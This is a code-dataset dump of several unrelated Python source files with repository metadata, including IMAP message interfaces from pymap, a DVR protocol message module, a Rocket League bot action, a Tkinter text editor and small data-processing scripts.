def flags_key(self) -> FlagsKey:
"""Hashable value that represents the current flags of this
message, used for detecting mailbox updates.
"""
...
@abstractmethod
def get_flags(self, session_flags: SessionFlags) -> frozenset[Flag]:
"""Get the full set of permanent and session flags for the message.
Args:
session_flags: The current session flags.
"""
...
class MessageInterface(Protocol):
"""Message data such as UID, permanent flags, and when the message was
added to the system.
"""
__slots__: Sequence[str] = []
@property
@abstractmethod
def uid(self) -> int:
"""The message's unique identifier in the mailbox."""
...
@property
@abstractmethod
def expunged(self) -> bool:
"""True if this message has been expunged from the mailbox."""
...
@property
@abstractmethod
def internal_date(self) -> datetime:
"""The message's internal date."""
...
@property
@abstractmethod
def permanent_flags(self) -> frozenset[Flag]:
"""The permanent flags for the message."""
...
@property
@abstractmethod
def email_id(self) -> ObjectId:
"""The message's email object ID, which can identify its content.
See Also:
`RFC 8474 5.1. <https://tools.ietf.org/html/rfc8474#section-5.1>`_
"""
...
@property
@abstractmethod
def thread_id(self) -> ObjectId:
"""The message's thread object ID, which groups messages together.
See Also:
`RFC 8474 5.2. <https://tools.ietf.org/html/rfc8474#section-5.2>`_
"""
...
@abstractmethod
def get_flags(self, session_flags: SessionFlags) -> frozenset[Flag]:
"""Get the full set of permanent and session flags for the message.
Args:
session_flags: The current session flags.
"""
...
@abstractmethod
async def load_content(self, requirement: FetchRequirement) \
-> LoadedMessageInterface:
"""Loads the content of the message.
Args:
requirement: The data required from the message content.
"""
...
class LoadedMessageInterface(Protocol):
"""The loaded message content, which may include the header, the body,
both, or neither, depending on the requirements.
It is assumed that this object contains the entire content in-memory. As
such, when multiple :class:`MessageInterface` objects are being processed,
only one :class:`LoadedMessageInterface` should be in scope at a time.
"""
__slots__: Sequence[str] = []
@property
@abstractmethod
def requirement(self) -> FetchRequirement:
"""The :class:`~pymap.parsing.specials.FetchRequirement` used to load
the message content.
"""
...
@abstractmethod
def __bytes__(self) -> bytes:
...
@abstractmethod
def get_header(self, name: bytes) -> Sequence[str]:
"""Get the values of a header from the message.
Args:
name: The name of the header.
"""
...
@abstractmethod
def get_headers(self, section: Sequence[int]) -> Writeable:
"""Get the headers from the message part.
The ``section`` argument indexes a nested sub-part of the message. For
example, ``[2, 3]`` would get the 2nd sub-part of the message and then
index it for its 3rd sub-part.
Args:
section: Nested list of sub-part indexes.
"""
...
@abstractmethod
def get_message_headers(self, section: Sequence[int] = None,
subset: Collection[bytes] = None,
inverse: bool = False) -> Writeable:
"""Get the headers from the message or a ``message/rfc822`` sub-part of
        the message.
The ``section`` argument can index a nested sub-part of the message.
For example, ``[2, 3]`` would get the 2nd sub-part of the message and
then index it for its 3rd sub-part.
Args:
section: Optional nested list of sub-part indexes.
subset: Subset of headers to get.
inverse: If ``subset`` is given, this flag will invert it so that
the headers *not* in ``subset`` are returned.
"""
...
@abstractmethod
def get_message_text(self, section: Sequence[int] = None) -> Writeable:
"""Get the text of the message part, not including headers.
The ``section`` argument can index a nested sub-part of the message.
For example, ``[2, 3]`` would get the 2nd sub-part of the message and
then index it for its 3rd sub-part.
Args:
section: Optional nested list of sub-part indexes.
"""
...
@abstractmethod
def get_body(self, section: Sequence[int] = None,
binary: bool = False) -> Writeable:
"""Get the full body of the message part, including headers.
The ``section`` argument can index a nested sub-part of the message.
For example, ``[2, 3]`` would get the 2nd sub-part of the message and
then index it for its 3rd sub-part.
Args:
section: Optional nested list of sub-part indexes.
binary: True if the result has decoded any
Content-Transfer-Encoding.
"""
...
@abstractmethod
def get_size(self, section: Sequence[int] = None) -> int:
"""Return the size of the message, in octets.
Args:
section: Optional nested list of sub-part indexes.
"""
...
@abstractmethod
def get_envelope_structure(self) -> EnvelopeStructure:
"""Build and return the envelope structure.
See Also:
`RFC 3501 2.3.5.
<https://tools.ietf.org/html/rfc3501#section-2.3.5>`_
"""
...
@abstractmethod
def get_body_structure(self) -> BodyStructure:
"""Build and return the body structure.
See Also:
`RFC 3501 2.3.6
<https://tools.ietf.org/html/rfc3501#section-2.3.6>`_
"""
...
@abstractmethod
def contains(self, value: bytes) -> bool:
"""Check the body of the message for a sub-string. This may be
optimized to only search headers and ``text/*`` MIME parts.
Args:
value: The sub-string to find.
"""
...
| 28.071197
| 79
| 0.613212
| 7,748
| 0.893244
| 0
| 0
| 6,495
| 0.748789
| 254
| 0.029283
| 5,144
| 0.593037
|
3c5b1d85968d78e7d6653a282357a7d53ef86e80
| 623
|
py
|
Python
|
auxiliary-scripts/LRC-to-Label.py
|
xbnstudios/show-scripts
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | 1
|
2018-03-08T16:00:31.000Z
|
2018-03-08T16:00:31.000Z
|
auxiliary-scripts/LRC-to-Label.py
|
ManualManul/XBN
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | null | null | null |
auxiliary-scripts/LRC-to-Label.py
|
ManualManul/XBN
|
fb2eb5bb41eadc9757567fb6b1217d6c2bad0620
|
[
"Unlicense"
] | null | null | null |
import glob
for file in glob.glob("*.lrc"):
filename = file[0:7] # assume fnt-xxx.lrc file format
lrc_file = open(file, encoding="utf-8")
lrc_lines = lrc_file.readlines()
lrc_file.close()
label = open(filename + '.txt', 'w', encoding="utf-8")
print(filename)
for line in lrc_lines[3:]:
time = line[line.find("[")+1:line.find("]")].replace('.', ':').split(':')
labeltime = str(int(time[0]) * 60 + int(time[1])) + '.' + time[2] + '0000'
title = line.split(']',1)[1].rstrip('\n')
label.write(labeltime + ' ' + labeltime + ' ' + title + '\n')
label.close()
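# Illustration of the conversion above (not from the original script): an LRC
# line such as "[03:25.50]Chorus" becomes the label line
# "205.500000 205.500000 Chorus" (identical start and end times, space-separated).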
| 31.15
| 82
| 0.552167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 103
| 0.165329
|
3c5b46fd9008363f42f8cbdbddac0fafdcddf679
| 2,750
|
py
|
Python
|
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
driving/boost_grab.py
|
Chadc265/DingusBot
|
98a05fe6ef75e2b48038f9fbbfacc204e89d0d86
|
[
"MIT"
] | null | null | null |
import math
from rlbot.agents.base_agent import SimpleControllerState
from rlbot.utils.structures.game_data_struct import GameTickPacket
from driving.drive import drive_to_target
from base.action import Action
from base.car import Car
from base.ball import Ball
from util.vec import Vec3
from util.boost import BoostTracker, Boost
class BoostGrab(Action):
def __init__(self, boost:Boost=None, boost_tracker:BoostTracker=None, only_in_path=False, max_time_to_boost=None, state:str = None):
super().__init__()
self.boost = boost
self.pad = None
self.boost_tracker = boost_tracker
self.in_path = only_in_path
self.max_time = max_time_to_boost
self.target = None
if self.boost is not None:
self.target = Vec3(self.boost.location)
self.state = "grabbing boost"
if state is not None:
self.state = state
def update(self, packet: GameTickPacket):
if self.boost is not None:
self.boost.update(packet)
def initialize_target_boost(self, car:Car):
if not car.flying:
if not self.max_time:
self.boost, self.pad = car.get_closest_boosts(self.boost_tracker, self.in_path)
if not self.boost:
self.boost = self.pad
else:
self.boost, self.pad, times = car.get_closest_boosts(self.boost_tracker, in_current_path=self.in_path,
path_angle_limit=0, return_time_to=True)
# No boost reachable. Life sucks
if times[0] >= self.max_time and times[1] >= self.max_time:
return False
if times[1] < self.max_time:
self.boost = self.pad
print("Boost target acquired!")
self.target = Vec3(self.boost.location)
return True
def run(self, car: Car=None, ball: Ball=None) -> SimpleControllerState:
if self.finished:
return SimpleControllerState()
if not self.boost and self.boost_tracker is not None:
if not self.initialize_target_boost(car):
self.finished = True
# Bail if finished, no boost passed, or boost no longer active
if self.finished or (not self.boost):
return self.controls
self.controls = drive_to_target(car, self.target.flat(), controls=self.controls)
# finished if close enough, boost taken, or car got enough along the way
if (car.local(self.target-car.location).length() < 100 or not self.boost.is_active) or car.boost > 99:
print("Grabbed boost!")
self.finished = True
return self.controls
| 42.96875
| 136
| 0.623636
| 2,418
| 0.879273
| 0
| 0
| 0
| 0
| 0
| 0
| 222
| 0.080727
|
3c5bb249ee0abe83ae7713176bfcb5fd594b89eb
| 2,026
|
py
|
Python
|
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
texteditor.py
|
bkenza/text-editor
|
595bcf0d8eb984287a7c8d7dac6ddc2f5e1549ad
|
[
"MIT"
] | null | null | null |
import sys
from tkinter import *
from tkinter import filedialog
####################
# FUNCTIONS #
####################
def saveas():
global text
t = text.get("1.0", "end-1c")
savelocation = filedialog.asksaveasfilename()
file1 = open(savelocation, "w+")
file1.write(t)
file1.close()
def darktheme():
global text
text.config(background='black', foreground='white',
insertbackground='white')
def lighttheme():
global text
text.config(background='white', foreground='black',
insertbackground='black')
def FontHelvetica():
global text
text.config(font="Helvetica")
def FontCourier():
global text
text.config(font="Courier")
def FontArial():
global text
text.config(font="Arial")
def FontTimes():
global text
text.config(font='Times')
#########################
# TEXT EDITOR
#########################
# Create text editor
text_editor = Tk()
text_editor.title("Kenza's text editor")
# Add text widget
text = Text(text_editor)
text.grid()
# Add save button
button = Button(text_editor, text="Save", command=saveas)
button.grid(row=1, column=1)
# Dark mode
theme = Button(text_editor, text="Dark", command=darktheme)
theme.grid(row=1, column=2)
# Light mode
theme = Button(text_editor, text="Light", command=lighttheme)
theme.grid(row=1, column=3)
# Add font menu
font = Menubutton(text_editor, text="Font")
font.grid(row=1, column=4)
font.menu = Menu(font, tearoff=0)
font["menu"] = font.menu
Helvetica = IntVar()
Arial = IntVar()
Times = IntVar()
Courier = IntVar()
font.menu.add_checkbutton(label="Courier", variable=Courier,
command=FontCourier)
font.menu.add_checkbutton(label="Helvetica", variable=Helvetica,
command=FontHelvetica)
font.menu.add_checkbutton(label="Arial", variable=Arial,
command=FontArial)
font.menu.add_checkbutton(label="Times", variable=Times,
command=FontTimes)
text_editor.mainloop()
| 20.886598
| 64
| 0.633268
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 387
| 0.191017
|
3c5cbe5565f6ab8319a2c93389c8a977b851666a
| 525
|
py
|
Python
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 106
|
2017-11-09T13:58:45.000Z
|
2021-12-20T03:11:19.000Z
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 6
|
2017-10-30T13:29:49.000Z
|
2021-09-13T12:06:59.000Z
|
api/models/__init__.py
|
NathanBMcNamara/Speculator
|
e74aff778d6657a8c4993c62f264008c9be99e78
|
[
"MIT"
] | 39
|
2017-10-30T16:35:01.000Z
|
2021-10-31T10:32:48.000Z
|
""" Default import all .py files in current directory """
from glob import iglob
from re import search
__all__ = []
""" Find all DB model modules and their paths """
for path in iglob('./**/*.py', recursive=True):
model_pattern = '.*/models/\w+\.py'
if search(model_pattern, path) is not None:
""" Get model modules """
FILE_INDEX = -1 # Files are the last part of a path
        module = path.split('/')[FILE_INDEX][:-len('.py')]  # drop the ".py" suffix
if module != '__init__':
__all__.append(module)
| 32.8125
| 59
| 0.617143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 214
| 0.407619
|
3c5cc632bb94b5ef7ccfb33dc669053fbfcfe760
| 1,374
|
py
|
Python
|
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
Software/localization_sims/mlat.py
|
ncsurobotics/acoustics-sw8
|
f2ab37416f7235c1d3681e5e2e237c26da276ed6
|
[
"MIT"
] | null | null | null |
from tdoa_sim import TDOASim
import numpy as np
class Multilateration(TDOASim):
# Assumptions: Three hydrophones forming a right angle in the xz plane
# Hydrophones 1 and 2 form the horizontal pair, and 2 and 3 form the vertical
# https://en.wikipedia.org/wiki/Multilateration - cartesian solution
def calculate_xyz(self, pinger_loc):
        relative_toas = self.calc_tdoas(pinger_loc) + .01  # Add 0.01 to avoid division by zero - this needs a much better implementation
x1, y1, z1 = self.hydrophones[0]
t1 = relative_toas[0]
c = self.v_sound
lhs = []
rhs = []
for i in range(1, 4):
xm, ym, zm = self.hydrophones[i]
tm = relative_toas[i]
A = (2 * xm) / (c * tm) - (2 * x1) / (c * t1)
B = (2 * ym) / (c * tm) - (2 * y1) / (c * t1)
C = (2 * zm) / (c * tm) - (2 * z1) / (c * t1)
D = c*tm - c*t1 - (xm ** 2 + ym ** 2 +zm ** 2)/(c * tm) + (x1 ** 2 + y1 ** 2 + z1 ** 2)/(c * t1)
lhs.append([A, B, C])
rhs.append(-D)
lhs = np.array(lhs)
rhs = np.array(rhs)
return np.linalg.solve(lhs, rhs)
def calculate_bearing(self, pinger_loc):
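        # Returns (azimuth from the +x axis in the xy-plane, inclination from the
        # +z axis), both in degrees, for the position solved by calculate_xyz().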
x, y, z = self.calculate_xyz(pinger_loc)
return (np.rad2deg(np.arctan2(y, x)), np.rad2deg(np.arctan2(np.sqrt(x ** 2 + y ** 2), z)))
| 37.135135
| 129
| 0.532751
| 1,323
| 0.962882
| 0
| 0
| 0
| 0
| 0
| 0
| 286
| 0.208151
|
3c5dbe6d61fbd8cfdc1de683ac736616ff35e009
| 2,811
|
py
|
Python
|
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | 1
|
2021-09-18T08:01:19.000Z
|
2021-09-18T08:01:19.000Z
|
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | null | null | null |
code/preprocess/consumption/sector/tn/tn_tx.py
|
Spacebody/MCM-ICM-2018-Problem-C
|
89acbec8b7b08733002e570ff67637e7ba100190
|
[
"MIT"
] | 1
|
2018-05-13T08:39:46.000Z
|
2018-05-13T08:39:46.000Z
|
#!/usr/bin/python3
import pandas as pd
import re
import numpy as np
import os
import sys
from collections import OrderedDict, defaultdict
import matplotlib as mpl
import matplotlib.pyplot as plt
# import seaborn as sns
from scipy import stats, integrate
# sns.set() # switch to seaborn default
# sns.set_style("whitegrid")
#load sector msncodes
tn_msncodes = pd.read_csv("data/csv/consumption/sector/tn_sector.csv", engine='c', low_memory=True)["MSN"]
#load state data
tx_data = pd.read_csv("data/csv/state_data/tx_data.csv", engine='c', low_memory=True)
tx_msn = []
tx_year = []
tx_value = []
for i in range(len(tx_data["MSN"])):
for j in range(len(tn_msncodes)):
if tx_data["MSN"][i] == tn_msncodes[j]:
tx_msn.append(tx_data["MSN"][i])
tx_year.append(tx_data["Year"][i])
tx_value.append(tx_data["Data"][i])
else:
pass
tx_tn = OrderedDict()
tx_tn["MSN"] = tx_msn
tx_tn["Year"] = tx_year
tx_tn["Data"] = tx_value
tx_tn_data = pd.DataFrame(tx_tn)
tx_tn_data.to_csv("data/csv/consumption/sector/tx/tx_tn_data.csv",
index=False, index_label=False, sep=',')
# print(tx_tn_data)
sectors = ["TNACB", "TNCCB", "TNICB", "TNRCB"]
tnacb = OrderedDict()
tnacb["Year"] = []
tnacb["Data"] = []
tnccb = OrderedDict()
tnccb["Year"] = []
tnccb["Data"] = []
tnicb = OrderedDict()
tnicb["Year"] = []
tnicb["Data"] = []
tnrcb = OrderedDict()
tnrcb["Year"] = []
tnrcb["Data"] = []
for i in range(len(tx_tn_data["MSN"])):
if tx_tn_data["MSN"][i] == "TNACB":
tnacb["Year"].append(tx_tn_data["Year"][i])
tnacb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNCCB":
tnccb["Year"].append(tx_tn_data["Year"][i])
tnccb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNICB":
tnicb["Year"].append(tx_tn_data["Year"][i])
tnicb["Data"].append(tx_tn_data["Data"][i])
elif tx_tn_data["MSN"][i] == "TNRCB":
tnrcb["Year"].append(tx_tn_data["Year"][i])
tnrcb["Data"].append(tx_tn_data["Data"][i])
else:
pass
tnacb_data = pd.DataFrame(tnacb)
tnacb_data.to_csv("data/csv/consumption/sector/tx/tn/tnacb.csv",
index=False, index_label=False, sep=',')
tnccb_data = pd.DataFrame(tnccb)
tnccb_data.to_csv("data/csv/consumption/sector/tx/tn/tnccb.csv",
index=False, index_label=False, sep=',')
tnicb_data = pd.DataFrame(tnicb)
tnicb_data.to_csv("data/csv/consumption/sector/tx/tn/tnicb.csv",
index=False, index_label=False, sep=',')
tnrcb_data = pd.DataFrame(tnrcb)
tnrcb_data.to_csv("data/csv/consumption/sector/tx/tn/tnrcb.csv",
index=False, index_label=False, sep=',')
# print(tnacb_data)
# print(tnccb_data)
# print(tnicb_data)
# print(tnrcb_data)
| 30.554348
| 106
| 0.645322
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 838
| 0.298115
|
3c5e4a066c2e5a426373071cec77c0e0b8244f50
| 10,040
|
py
|
Python
|
dvrip/message.py
|
alexshpilkin/xmeye
|
e76df1d091d85aa6cffb5c332ba6ae419ac9ac89
|
[
"CC0-1.0"
] | 34
|
2019-05-04T06:06:17.000Z
|
2021-12-06T03:28:40.000Z
|
dvrip/message.py
|
alexshpilkin/xmeye
|
e76df1d091d85aa6cffb5c332ba6ae419ac9ac89
|
[
"CC0-1.0"
] | 9
|
2019-06-17T09:37:50.000Z
|
2020-10-24T22:36:29.000Z
|
dvrip/message.py
|
alexshpilkin/xmeye
|
e76df1d091d85aa6cffb5c332ba6ae419ac9ac89
|
[
"CC0-1.0"
] | 21
|
2019-06-17T09:34:27.000Z
|
2022-03-22T18:14:22.000Z
|
from abc import abstractmethod
from datetime import datetime, timedelta
from enum import Enum, unique
from io import RawIOBase
from json import dumps, load
from string import hexdigits
from typing import ClassVar, Generator, Generic, Iterable, List, Optional, \
Sequence, Type, TypeVar, Union, cast
from .errors import DVRIPDecodeError
from .packet import Packet
from .typing import Value, for_json, json_to
_C = TypeVar('_C', bound='Choice')
_M = TypeVar('_M', bound='Message')
_R = TypeVar('_R', bound='Status')
_S = TypeVar('_S', bound='Session')
_T = TypeVar('_T')
class _ChunkReader(RawIOBase):
def __init__(self, chunks: Iterable[bytes]) -> None:
super().__init__()
self.chunks = list(chunks)
self.chunks.reverse()
def readable(self) -> bool:
return True
def readinto(self, buffer: bytearray) -> int:
if not self.chunks:
return 0 # EOF
chunk = self.chunks[-1]
assert chunk
buffer[:len(chunk)] = chunk[:len(buffer)]
if len(chunk) > len(buffer): # pylint: disable=no-else-return
self.chunks[-1] = chunk[len(buffer):]
return len(buffer)
else:
self.chunks.pop()
return len(chunk)
def _hex_for_json(value: int) -> object:
return for_json('0x{:08X}'.format(value))
def _json_to_hex(datum: object) -> int:
datum = json_to(str)(datum)
if (datum[:2] != '0x' or len(datum) > 10 or
not all(c in hexdigits for c in datum[2:])):
raise DVRIPDecodeError('not a session ID')
return int(datum[2:], 16)
hextype = (_json_to_hex, _hex_for_json)
_DTFORMAT = '%Y-%m-%d %H:%M:%S'
_NOSTRING = '0000-00-00 00:00:00'
_EPSTRING = '2000-00-00 00:00:00'
EPOCH = datetime(2000, 1, 1, 0, 0, 0)
RESOLUTION = timedelta(seconds=1)
def _datetime_for_json(value: Optional[datetime]) -> object:
if value is None:
return _NOSTRING
if value == EPOCH:
return _EPSTRING
if value <= EPOCH:
raise ValueError('datetime not after the epoch')
return for_json(value.strftime(_DTFORMAT))
def _json_to_datetime(datum: object) -> Optional[datetime]:
datum = json_to(str)(datum)
if datum == _NOSTRING:
return None
if datum == _EPSTRING:
return EPOCH
try:
value = datetime.strptime(datum, _DTFORMAT)
except ValueError:
raise DVRIPDecodeError('not a datetime string')
if value <= EPOCH:
raise DVRIPDecodeError('datetime not after the epoch')
return value
datetimetype = (_json_to_datetime, _datetime_for_json)
class Choice(Enum):
def __repr__(self) -> str:
return '{}.{}'.format(type(self).__qualname__, self.name)
def __str__(self) -> str:
return self.value
def for_json(self) -> object:
return for_json(self.value)
@classmethod
def json_to(cls: Type[_C], datum: object) -> _C:
try:
return cls(json_to(str)(datum))
except ValueError:
raise DVRIPDecodeError('not a known choice')
class Session(object):
__slots__ = ('id',)
def __init__(self, id: int) -> None: # pylint: disable=redefined-builtin
self.id = id
def __repr__(self) -> str:
return 'Session(0x{:08X})'.format(self.id)
def __eq__(self, other: object):
if not isinstance(other, Session):
return NotImplemented
return self.id == other.id
def __hash__(self) -> int:
return hash(self.id)
def for_json(self) -> object:
return _hex_for_json(self.id)
@classmethod
def json_to(cls: Type[_S], datum: object) -> _S:
return cls(id=_json_to_hex(datum))
@unique
class Status(Enum): # FIXME derive from Choice
__slots__ = ('code', 'success', 'message', '_value_')
code: int
success: bool
message: str
def __new__(cls: Type[_R], code, success, message) -> _R:
self = object.__new__(cls)
self._value_ = code # pylint: disable=protected-access
self.code = code
self.success = success
self.message = message
return self
# FIXME __init__
def __repr__(self) -> str:
return '{}({!r})'.format(type(self).__qualname__, self._value_)
def __str__(self) -> str:
return self.message
def __bool__(self) -> bool:
return self.success
def for_json(self) -> object:
return for_json(self.code)
@classmethod
def json_to(cls: Type[_R], datum: object) -> _R:
try:
return cls(json_to(int)(datum)) # type: ignore # pylint: disable=no-value-for-parameter
except ValueError:
raise DVRIPDecodeError('not a known status code')
# pylint: disable=line-too-long
OK = (100, True, 'OK')
ERROR = (101, False, 'Unknown error')
VERSION = (102, False, 'Invalid version')
REQUEST = (103, False, 'Invalid request') # FIXME type?
EXLOGIN = (104, False, 'Already logged in')
NOLOGIN = (105, False, 'Not logged in')
CREDS = (106, False, 'Wrong username or password')
ACCESS = (107, False, 'Access denied')
TIMEOUT = (108, False, 'Timed out')
FILE = (109, False, 'File not found')
SRCHCOMP = (110, True, 'Complete search results')
SRCHPART = (111, True, 'Partial search results')
EXUSER = (112, False, 'User already exists')
NOUSER = (113, False, 'User does not exist')
EXGROUP = (114, False, 'Group already exists')
NOGROUP = (115, False, 'Group does not exist')
MESSAGE = (117, False, 'Invalid message') # FIXME JSON?
PTZPROTO = (118, False, 'PTZ protocol not set')
SRCHNONE = (119, True, 'No search results')
	DISABLED = (120, False, 'Disabled')  # FIXME configured as enabled
CONNECT = (121, False, 'Channel not connected')
REBOOT = (150, True, 'Reboot required')
	FIXME202 = (202, False, 'FIXME Error 202')  # FIXME user not logged in
PASSWORD = (203, False, 'Wrong password')
USERNAME = (204, False, 'Wrong username')
LOCKOUT = (205, False, 'Locked out')
BANNED = (206, False, 'Banned')
CONFLICT = (207, False, 'Already logged in')
INPUT = (208, False, 'Illegal value') # FIXME of field?
	FIXME209 = (209, False, 'FIXME Error 209')  # FIXME duplicate index, e.g. the user to be added already exists
	FIXME210 = (210, False, 'FIXME Error 210')  # FIXME object does not exist (used for queries)
OBJECT = (211, False, 'Object does not exist')
ACCOUNT = (212, False, 'Account in use')
SUBSET = (213, False, 'Subset larger than superset')
	PASSCHAR = (214, False, 'Illegal characters in password')  # FIXME password not valid
PASSMTCH = (215, False, 'Passwords do not match')
USERRESV = (216, False, 'Username reserved')
	COMMAND = (502, False, 'Illegal command')  # FIXME command not valid
INTERON = (503, True, 'Intercom turned on')
	INTEROFF = (504, True, 'Intercom turned off')  # FIXME intercom not turned on
OKUPGR = (511, True, 'Upgrade started')
NOUPGR = (512, False, 'Upgrade not started')
UPGRDATA = (513, False, 'Invalid upgrade data')
OKUPGRD = (514, True, 'Upgrade successful')
NOUPGRD = (515, False, 'Upgrade failed')
NORESET = (521, False, 'Reset failed')
	OKRESET = (522, True, 'Reset successful--reboot required')  # FIXME device reboot required
INVRESET = (523, False, 'Reset data invalid')
	OKIMPORT = (602, True, 'Import successful--restart required')  # FIXME application restart required (et seqq)
REIMPORT = (603, True, 'Import successful--reboot required')
WRITING = (604, False, 'Configuration write failed')
FEATURE = (605, False, 'Unsupported feature in configuration')
READING = (606, False, 'Configuration read failed')
NOIMPORT = (607, False, 'Configuration not found')
SYNTAX = (608, False, 'Illegal configuration syntax')
class Message(Value):
__slots__ = ()
@property
@abstractmethod
def type(self) -> int:
raise NotImplementedError # pragma: no cover
def chunks(self) -> Sequence[bytes]:
size = Packet.MAXLEN # FIXME Don't mention Packet explicitly?
json = dumps(self.for_json()).encode('ascii')
return [json[i:i+size] for i in range(0, len(json), size)]
def topackets(self, session: Session, number: int) -> Iterable[Packet]:
chunks = self.chunks()
length = len(chunks)
if length == 1:
yield Packet(session.id, number, self.type, chunks[0],
fragments=0, fragment=0)
else:
for i, chunk in enumerate(chunks):
yield Packet(session.id, number, self.type,
chunk, fragments=length,
fragment=i)
@classmethod
def fromchunks(cls: Type[_M], chunks: Iterable[bytes]) -> _M:
chunks = list(chunks)
if not chunks:
raise DVRIPDecodeError('no data in DVRIP packet')
chunks[-1] = chunks[-1].rstrip(b'\x00\\')
return cls.json_to(load(_ChunkReader(chunks))) # type: ignore # FIXME
@classmethod
def frompackets(cls: Type[_M], packets: Iterable[Packet]) -> _M:
packets = list(packets)
return cls.fromchunks(p.payload for p in packets if p.payload)
Filter = Generator[Union['NotImplemented', None, _T], Optional[Packet], None]
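# A Filter is driven as a coroutine: the caller primes it, then send()s packets
# in and receives back None (more packets needed), NotImplemented (the packet is
# not for this filter), or a final value such as the reassembled message/payload.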
def controlfilter(cls: Type[_M], number: int) -> Filter[_M]:
count = 0
limit = 0
packets: List[Optional[Packet]] = []
packet = yield None # prime the pump
while True:
assert packet is not None
		if packet.type != cls.type:
			packet = yield NotImplemented
			continue
		if packet.number & ~1 != number & ~1:
			packet = yield NotImplemented
			continue
if not limit:
limit = max(packet.fragments, 1)
packets = [None] * limit
if max(packet.fragments, 1) != limit:
raise DVRIPDecodeError('conflicting fragment counts')
if packet.fragment >= limit:
raise DVRIPDecodeError('invalid fragment number')
if packets[packet.fragment] is not None:
raise DVRIPDecodeError('overlapping fragments')
assert count < limit
packets[packet.fragment] = packet
count += 1
if count < limit:
yield None
packet = yield None
continue
else:
assert all(p is not None for p in packets)
yield cls.frompackets(cast(List[Packet], packets))
return
def streamfilter(type: int) -> Filter[Union[bytes, bytearray, memoryview]]: # pylint: disable=redefined-builtin
packet = yield None # prime the pump
while True:
assert packet is not None
if packet.type != type:
packet = yield NotImplemented
continue
yield packet.payload if packet.payload else None
if packet.end: return
packet = yield None
class Request(Generic[_M], Message):
reply: ClassVar[Type[_M]]
data: ClassVar[int]
@classmethod
def replies(cls, number: int) -> Filter[_M]:
return controlfilter(cls.reply, number)
@classmethod
def stream(cls) -> Filter[Union[bytes, bytearray, memoryview]]:
return streamfilter(cls.data)
| 30.892308
| 112
| 0.684363
| 6,897
| 0.678171
| 1,736
| 0.170698
| 4,926
| 0.484366
| 0
| 0
| 2,310
| 0.227139
|
3c699b1ae35663ad09b05a480af4601cff664c7b
| 1,276
|
py
|
Python
|
opennem/core/stations/station_code_from_duids.py
|
willhac/opennem
|
c8fbcd60e06898e1eeb2dad89548c4ece1b9a319
|
[
"MIT"
] | null | null | null |
opennem/core/stations/station_code_from_duids.py
|
willhac/opennem
|
c8fbcd60e06898e1eeb2dad89548c4ece1b9a319
|
[
"MIT"
] | 1
|
2020-09-06T04:17:59.000Z
|
2020-09-06T04:17:59.000Z
|
opennem/core/stations/station_code_from_duids.py
|
tourdownunder/opennem
|
deec3e2079db9d9d84171010fd0c239170d1e7ce
|
[
"MIT"
] | null | null | null |
from functools import reduce
from typing import List, Optional
from opennem.core.normalizers import is_single_number
def getcommonletters(strlist):
return "".join(
[
x[0]
for x in zip(*strlist)
if reduce(lambda a, b: (a == b) and a or None, x)
]
)
def findcommonstart(strlist):
strlist = strlist[:]
prev = None
while True:
common = getcommonletters(strlist)
if common == prev:
break
strlist.append(common)
prev = common
return getcommonletters(strlist)
def station_code_from_duids(duids: List[str]) -> Optional[str]:
"""
Derives a station code from a list of duids
ex.
BARRON1,BARRON2 => BARRON
OSBAG,OSBAG => OSBAG
"""
if type(duids) is not list:
return None
if not duids:
return None
if len(duids) == 0:
return None
duids_uniq = list(set(duids))
common = findcommonstart(duids_uniq)
if not common:
return None
# strip last character if we have one
if is_single_number(common[-1]):
common = common[:-1]
if common.endswith("_"):
common = common[:-1]
if len(common) > 2:
return common
return None
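
# Minimal usage sketch (not part of the original module). Expected values follow
# the docstring examples above; this assumes is_single_number() simply reports
# whether a character is a digit, as its name suggests.
if __name__ == "__main__":
    print(station_code_from_duids(["BARRON1", "BARRON2"]))  # BARRON
    print(station_code_from_duids(["OSBAG", "OSBAG"]))      # OSBAG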
| 19.044776
| 63
| 0.580721
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 183
| 0.143417
|
3c6baa9940a450d52040d4e352d35fb76791c5db
| 1,733
|
py
|
Python
|
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | null | null | null |
models/Schedule.py
|
CargaPesada/webservice
|
2725dc9ac97e8e09a94b0a752b0885bc77d8a3d4
|
[
"MIT"
] | 1
|
2019-11-06T19:21:49.000Z
|
2019-11-06T19:21:49.000Z
|
models/Schedule.py
|
CargaPesada/webservice
|
